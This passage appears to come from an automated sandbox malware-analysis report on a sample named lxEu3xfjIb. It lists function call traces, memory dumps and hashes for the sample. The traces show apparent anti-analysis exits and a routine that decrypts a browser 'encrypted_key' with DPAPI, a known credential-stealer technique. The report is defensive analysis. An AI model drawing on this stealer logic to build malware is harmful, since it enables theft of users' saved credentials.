                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                              • String ID: cA
                                              • API String ID: 2667927680-2872761854
                                              • Opcode ID: a663d27af1db11ea6e0538481b6c1ec1bf0866bdd2edd05cd7ef4aaec1a8ff54
                                              • Instruction ID: dc16e4b81abbfe3fe676fda19ddb0faac8fab1e973e0b9c2e11f24d889f851c9
                                              • Opcode Fuzzy Hash: a663d27af1db11ea6e0538481b6c1ec1bf0866bdd2edd05cd7ef4aaec1a8ff54
                                              • Instruction Fuzzy Hash: CD21C8B6E04218A7CB14FB70EC46EED333E9B94300F40455EB656561D1EE78ABC8CB95
                                              Function 04841487 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                              Download Yara Rule
                                              APIs
                                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 048414A5
                                              • __aulldiv.LIBCMT ref: 048414BF
                                              • __aulldiv.LIBCMT ref: 048414CD
                                              • ExitProcess.KERNEL32 ref: 048414FB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                              • String ID: @
                                              • API String ID: 3404098578-2766056989
                                              • Opcode ID: 878a90f34e096d30e7d89448c69a574e23fa6b892c1598a4a852eafceae412f3
                                              • Instruction ID: 402d9f82b5b75d4f6e68306589afcfb05edb191172b75b5af15ada0168e3bc5d
                                              • Opcode Fuzzy Hash: 878a90f34e096d30e7d89448c69a574e23fa6b892c1598a4a852eafceae412f3
                                              • Instruction Fuzzy Hash: 620112B1D4430CEAEF10EFD4CC4DB9DBBBAAB40709F208A49EA05F61D0D7B4A5858756
                                              Function 0484A7C7 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 155memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • memcmp.MSVCRT(?,0042124C,00000003), ref: 0484A7E4
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                              • memcmp.MSVCRT(?,004210FC,00000003), ref: 0484A839
                                              • memset.MSVCRT ref: 0484A872
                                              • LocalAlloc.KERNEL32(00000040,?), ref: 0484A8CB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: memcmp$AllocLocallstrcpymemset
                                              • String ID: @
                                              • API String ID: 631489823-2766056989
                                              • Opcode ID: a0dfd0b00870158b78f1bd2e6a7999d260a6401e0527ae678fcebbd35b121d7e
                                              • Instruction ID: cb294bf6c6fcb9f1ac6199ba4f562f639ac2d04ae96b31b5ff8ed9c1bd88514a
                                              • Opcode Fuzzy Hash: a0dfd0b00870158b78f1bd2e6a7999d260a6401e0527ae678fcebbd35b121d7e
                                              • Instruction Fuzzy Hash: 6D512E3064024C9FDB18EFA8DD99FED7771AF54308F408618E909AF5A0DBB47A45CB51
                                              Function 00410FC0 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • strtok_s.MSVCRT ref: 00410FE8
                                              • strtok_s.MSVCRT ref: 0041112D
                                                • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,02C9D528,?,004210F4,?,00000000), ref: 0041AB3B
                                                • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: strtok_s$lstrcpylstrlen
                                              • String ID:
                                              • API String ID: 348468850-0
                                              • Opcode ID: 77d8088bb27251dd49dfcd07a26e8087964298c25f1e83629a7bc62193e0fc7a
                                              • Instruction ID: 03db8a1056b7d3decc043d16849240f9eafe82692520a9407f7f8401fd2e2a69
                                              • Opcode Fuzzy Hash: 77d8088bb27251dd49dfcd07a26e8087964298c25f1e83629a7bc62193e0fc7a
                                              • Instruction Fuzzy Hash: EF515E75A0410AEFCB08CF54D595AEEBBB5FF48308F10805EE9029B361D734EA91CB95
                                              Function 0040A430 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 97COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                • Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                                • Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                                • Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                                • Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                                • Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                                • Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                                • Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2
                                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0040A489
                                                • Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A23F
                                                • Part of subcall function 0040A210: LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 0040A251
                                                • Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A27A
                                                • Part of subcall function 0040A210: LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 0040A28F
                                              • memcmp.MSVCRT(?,DPAPI,00000005), ref: 0040A4E2
                                                • Part of subcall function 0040A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040A2D4
                                                • Part of subcall function 0040A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A2F3
                                                • Part of subcall function 0040A2B0: memcpy.MSVCRT(?,?,?), ref: 0040A316
                                                • Part of subcall function 0040A2B0: LocalFree.KERNEL32(?), ref: 0040A323
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
                                              • String ID: $"encrypted_key":"$DPAPI
                                              • API String ID: 3731072634-738592651
                                              • Opcode ID: 670b58208e1ff2a3ebe60e827019e5f1f1af2f7c111c07866c18d1fd8af9f875
                                              • Instruction ID: 27b9d937d1eb2b37959d1b0821c640950517226354c316aa9f1795df4e4508dc
                                              • Opcode Fuzzy Hash: 670b58208e1ff2a3ebe60e827019e5f1f1af2f7c111c07866c18d1fd8af9f875
                                              • Instruction Fuzzy Hash: 323152B6D00209ABCF04DBD4DC45AEFB7B8BF58304F44456AE901B7281E7389A54CB6A
                                              Function 0485D0D0 Relevance: 7.6, APIs: 5, Instructions: 94COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CodeInfoPageValidmemset
                                              • String ID:
                                              • API String ID: 703783727-0
                                              • Opcode ID: df407eb42ed6ae19740f6001b4b28ec45f3a0947630176eabde2e48c15dd9d5f
                                              • Instruction ID: 307a97789830873ca7db4748bf60da2672c9e77119a2a756061a49bfaab819da
                                              • Opcode Fuzzy Hash: df407eb42ed6ae19740f6001b4b28ec45f3a0947630176eabde2e48c15dd9d5f
                                              • Instruction Fuzzy Hash: 1B310430A083558AFB259F78E89437ABFE0AF42315F14CBAADC95CB1B1D668F005D751
                                              Function 048BC049 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: dllmain_raw$dllmain_crt_dispatch
                                              • String ID:
                                              • API String ID: 3136044242-0
                                              • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                              • Instruction ID: 247706a9a785eb59e16ab7bd8c5e02fdd8b4dcf81df3bd3e180596422cac701f
                                              • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                              • Instruction Fuzzy Hash: FB219472D00619BFEB21AF58CC409EE7A69EB85A98F014B1DF954FB310D770AD429BD0
                                              Function 00416BC0 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetSystemTime.KERNEL32(004210F4,?,?,00416DB1,00000000,?,02C9D528,?,004210F4,?,00000000,?), ref: 00416C0C
                                              • sscanf.NTDLL ref: 00416C39
                                              • SystemTimeToFileTime.KERNEL32(004210F4,00000000,?,?,?,?,?,?,?,?,?,?,?,02C9D528,?,004210F4), ref: 00416C52
                                              • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,02C9D528,?,004210F4), ref: 00416C60
                                              • ExitProcess.KERNEL32 ref: 00416C7A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Time$System$File$ExitProcesssscanf
                                              • String ID:
                                              • API String ID: 2533653975-0
                                              • Opcode ID: 8f3d302021b633d499eebc2b75f511318c1b224c781d312d182f2b4f083543dc
                                              • Instruction ID: 1a92bae8d2aea180e7b918fcc5e881d349bf880cfa552010dcbd9d747ca2879d
                                              • Opcode Fuzzy Hash: 8f3d302021b633d499eebc2b75f511318c1b224c781d312d182f2b4f083543dc
                                              • Instruction Fuzzy Hash: 0321CD75D142089BCF14DFE4E9459EEB7BABF48300F04852EF506A3250EB349644CB69
                                              Function 04856E27 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetSystemTime.KERNEL32(?), ref: 04856E73
                                              • sscanf.NTDLL ref: 04856EA0
                                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 04856EB9
                                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 04856EC7
                                              • ExitProcess.KERNEL32 ref: 04856EE1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Time$System$File$ExitProcesssscanf
                                              • String ID:
                                              • API String ID: 2533653975-0
                                              • Opcode ID: 6f773626f3441833338ad6a64aabe7637b4b1e18bec63e878425460b9ebe86da
                                              • Instruction ID: ea7c614f4ea8cfd8bd8cd82c6856cd651dfbcc6a098122b60f3425462434f911
                                              • Opcode Fuzzy Hash: 6f773626f3441833338ad6a64aabe7637b4b1e18bec63e878425460b9ebe86da
                                              • Instruction Fuzzy Hash: 9421DFB5D14219ABCF14EFE4E8459EEB7B6BF48300F04856EE415F3250EB74A604CB65
                                              Function 00417F90 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417FC7
                                              • HeapAlloc.KERNEL32(00000000), ref: 00417FCE
                                              • RegOpenKeyExA.ADVAPI32(80000002,02CA13D8,00000000,00020119,?), ref: 00417FEE
                                              • RegQueryValueExA.ADVAPI32(?,02CA5EF0,00000000,00000000,000000FF,000000FF), ref: 0041800F
                                              • RegCloseKey.ADVAPI32(?), ref: 00418022
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocCloseOpenProcessQueryValue
                                              • String ID:
                                              • API String ID: 3466090806-0
                                              • Opcode ID: 7a9c0ba5048ddb27ec33de3f8be0389340df971bddb9b3c1683f2c2c2fb7b9da
                                              • Instruction ID: 7366865410052b2090c980cb0782fc53e6cc971cacc9a0cbb18d91746b71e1a2
                                              • Opcode Fuzzy Hash: 7a9c0ba5048ddb27ec33de3f8be0389340df971bddb9b3c1683f2c2c2fb7b9da
                                              • Instruction Fuzzy Hash: 981151B1E45209EBD700CF94DD45FBFBBB9EB48B11F10421AF615A7280E77959048BA2
                                              Function 048581F7 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0485822E
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 04858235
                                              • RegOpenKeyExA.ADVAPI32(80000002,006D6BD4,00000000,00020119,?), ref: 04858255
                                              • RegQueryValueExA.ADVAPI32(?,006D6EEC,00000000,00000000,000000FF,000000FF), ref: 04858276
                                              • RegCloseKey.ADVAPI32(?), ref: 04858289
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                              • String ID:
                                              • API String ID: 3225020163-0
                                              • Opcode ID: 7a9c0ba5048ddb27ec33de3f8be0389340df971bddb9b3c1683f2c2c2fb7b9da
                                              • Instruction ID: cbe5763b098d54b93729bfa104fa057ddc98915d76c2bb2e3df523add175b2eb
                                              • Opcode Fuzzy Hash: 7a9c0ba5048ddb27ec33de3f8be0389340df971bddb9b3c1683f2c2c2fb7b9da
                                              • Instruction Fuzzy Hash: 33118FB1E4520AABD700DFC4EC45FBBBBB9EB44B10F10421AF611E6290E7B469008BA1
                                              Function 04857B17 Relevance: 7.5, APIs: 5, Instructions: 42registrymemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 04857B2B
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 04857B32
                                              • RegOpenKeyExA.ADVAPI32(80000002,006D6D98,00000000,00020119,04857AB0), ref: 04857B52
                                              • RegQueryValueExA.ADVAPI32(04857AB0,00420AB4,00000000,00000000,?,000000FF), ref: 04857B71
                                              • RegCloseKey.ADVAPI32(04857AB0), ref: 04857B7B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                              • String ID:
                                              • API String ID: 3225020163-0
                                              • Opcode ID: 14ae58864b366c4003c6da9e1b5cfb2a16c067edbf69ef05e192f5cb5c601d9e
                                              • Instruction ID: 649206678be71188d3ea338197e689c7c749acd4db3aa64749a0d5391c4674fb
                                              • Opcode Fuzzy Hash: 14ae58864b366c4003c6da9e1b5cfb2a16c067edbf69ef05e192f5cb5c601d9e
                                              • Instruction Fuzzy Hash: CD01E1B5E45309BBEB00DBD4DC49FAE7779AB44701F10459AFA05A6290E67066008B91
                                              Function 004193F0 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • StrStrA.SHLWAPI(02CA54D8,00000000,00000000,?,00409F71,00000000,02CA54D8,00000000), ref: 004193FC
                                              • lstrcpyn.KERNEL32(006D7580,02CA54D8,02CA54D8,?,00409F71,00000000,02CA54D8), ref: 00419420
                                              • lstrlenA.KERNEL32(00000000,?,00409F71,00000000,02CA54D8), ref: 00419437
                                              • wsprintfA.USER32 ref: 00419457
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpynlstrlenwsprintf
                                              • String ID: %s%s
                                              • API String ID: 1206339513-3252725368
                                              • Opcode ID: 84a337f0fca5bdf22d9977d595415c9580f1c6ff8586b832ae243cfd604c2dbf
                                              • Instruction ID: 36a1aade9beab669742e698a5986ef2a8e6d9b7fa0e45cca69d8a80143706e49
                                              • Opcode Fuzzy Hash: 84a337f0fca5bdf22d9977d595415c9580f1c6ff8586b832ae243cfd604c2dbf
                                              • Instruction Fuzzy Hash: 9B011E75A18108FFCB04DFA8DD54EAE7B79EF48304F108249F9098B340EB31AA40DB96
                                              Function 04859657 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • StrStrA.SHLWAPI(\nm,00000000,00000000,?,0484A1D8,00000000,006D6E5C,00000000), ref: 04859663
                                              • lstrcpyn.KERNEL32(006D7580,\nm,\nm,?,0484A1D8,00000000,006D6E5C), ref: 04859687
                                              • lstrlen.KERNEL32(00000000,?,0484A1D8,00000000,006D6E5C), ref: 0485969E
                                              • wsprintfA.USER32 ref: 048596BE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpynlstrlenwsprintf
                                              • String ID: \nm
                                              • API String ID: 1206339513-1385846026
                                              • Opcode ID: 84a337f0fca5bdf22d9977d595415c9580f1c6ff8586b832ae243cfd604c2dbf
                                              • Instruction ID: 95050201d588f11a20d60364009d1207a83c295e6be0349d7f15d973bdc3a577
                                              • Opcode Fuzzy Hash: 84a337f0fca5bdf22d9977d595415c9580f1c6ff8586b832ae243cfd604c2dbf
                                              • Instruction Fuzzy Hash: 3C011275904108FFCB04DFA8DD54EAE7BB9EF44304F148649F9098B350E631AA40DB96
                                              Function 004012A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                              • HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                              • RegCloseKey.ADVAPI32(?), ref: 004012FF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocCloseOpenProcessQueryValue
                                              • String ID:
                                              • API String ID: 3466090806-0
                                              • Opcode ID: 105a35557efbe30c530503ad4a66e3d917ab5a2bcfe7a77369b2bd71da3f475d
                                              • Instruction ID: b0bfc99e0bb5f41d030d85d97ebb5ad9faa7414484ca5a523084a8432581bb26
                                              • Opcode Fuzzy Hash: 105a35557efbe30c530503ad4a66e3d917ab5a2bcfe7a77369b2bd71da3f475d
                                              • Instruction Fuzzy Hash: D1013179E45209BFDB00DFD0DC49FAE7779EB48701F00419AFA05A7280E770AA008B91
                                              Function 04841507 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0484151B
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 04841522
                                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 0484153E
                                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 0484155C
                                              • RegCloseKey.ADVAPI32(?), ref: 04841566
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                              • String ID:
                                              • API String ID: 3225020163-0
                                              • Opcode ID: 105a35557efbe30c530503ad4a66e3d917ab5a2bcfe7a77369b2bd71da3f475d
                                              • Instruction ID: c9af1141d1960b0577fc1c8b54163734c41ebdc85579db2104b75967111d429c
                                              • Opcode Fuzzy Hash: 105a35557efbe30c530503ad4a66e3d917ab5a2bcfe7a77369b2bd71da3f475d
                                              • Instruction Fuzzy Hash: 7F01E179E45209BFDB04DFD4DC49FAE7779EB48701F104599FA0597280E770AA408B91
                                              Function 0041CA72 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • __getptd.LIBCMT ref: 0041CA7E
                                                • Part of subcall function 0041C2A0: __getptd_noexit.LIBCMT ref: 0041C2A3
                                                • Part of subcall function 0041C2A0: __amsg_exit.LIBCMT ref: 0041C2B0
                                              • __getptd.LIBCMT ref: 0041CA95
                                              • __amsg_exit.LIBCMT ref: 0041CAA3
                                              • __lock.LIBCMT ref: 0041CAB3
                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 0041CAC7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                              • String ID:
                                              • API String ID: 938513278-0
                                              • Opcode ID: 8e15bae909d06919cb4135276c74b5d3530aaf41c11ecb0caa68e2a981b89e64
                                              • Instruction ID: c5a7914bfd81a4edf64c409ce704b1973edb92a02c079c255f399551119664c9
                                              • Opcode Fuzzy Hash: 8e15bae909d06919cb4135276c74b5d3530aaf41c11ecb0caa68e2a981b89e64
                                              • Instruction Fuzzy Hash: D0F06231A803189BD622FBA95C867DE33A0AF40758F50014FE405562D2CB7C59C186DE
                                              Function 0485CCD9 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • __getptd.LIBCMT ref: 0485CCE5
                                                • Part of subcall function 0485C507: __getptd_noexit.LIBCMT ref: 0485C50A
                                                • Part of subcall function 0485C507: __amsg_exit.LIBCMT ref: 0485C517
                                              • __getptd.LIBCMT ref: 0485CCFC
                                              • __amsg_exit.LIBCMT ref: 0485CD0A
                                              • __lock.LIBCMT ref: 0485CD1A
                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 0485CD2E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
